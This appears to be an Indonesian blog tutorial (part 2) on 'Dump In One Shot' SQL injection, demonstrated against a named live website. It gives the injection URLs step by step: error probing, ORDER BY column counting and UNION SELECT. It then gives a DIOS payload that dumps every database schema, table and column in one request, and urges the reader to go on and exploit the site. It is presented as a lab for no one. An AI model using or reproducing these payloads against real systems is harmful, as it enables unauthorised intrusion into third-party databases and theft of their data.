Dump In One Shot ( part 2 )

Hallo , assalamualaikum .

masih ingat apa itu DIOS ? ( Dump In One Shot ) yaitu Query SQL injection untuk Dump data dalam satu kali tindakan. ini tutorial yang ke dua :

1. Tentukan target

disini saya ada target live :

http://www.icdcprague.org/index.php?id=10

2. Beri String

http://www.icdcprague.org/index.php?id=10'

muncul pesan 

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in/www/sites/2/site8082/public_html/index.php on line 51

3. Cari Jumlah tabel count

http://www.icdcprague.org/index.php?id=-10'+order+by+1--+ no respon

http://www.icdcprague.org/index.php?id=-10'+order+by+2--+ no respon

http://www.icdcprague.org/index.php?id=-10'+order+by+6--+ no respon

http://www.icdcprague.org/index.php?id=-10'+order+by+7--+ muncul pesan errornya.

Berarti tabel errornya count nya sampai 6, dikarenakan 7 error.

4. Cari Column Count nya

http://www.icdcprague.org/index.php?id=-10'+union+select+1,2,3,4,5,6--+

muncul column count nya yaitu angka 4.

5. Beri query DIOS

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns) 
where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,table_schema,' :: ',table_name,' :: ',column_name))))a)

Muncul deh :D

lanjut eksekusi .

sekian dan terima kasih , semoga tutorial ini bermanfaat,

wassalamualaikum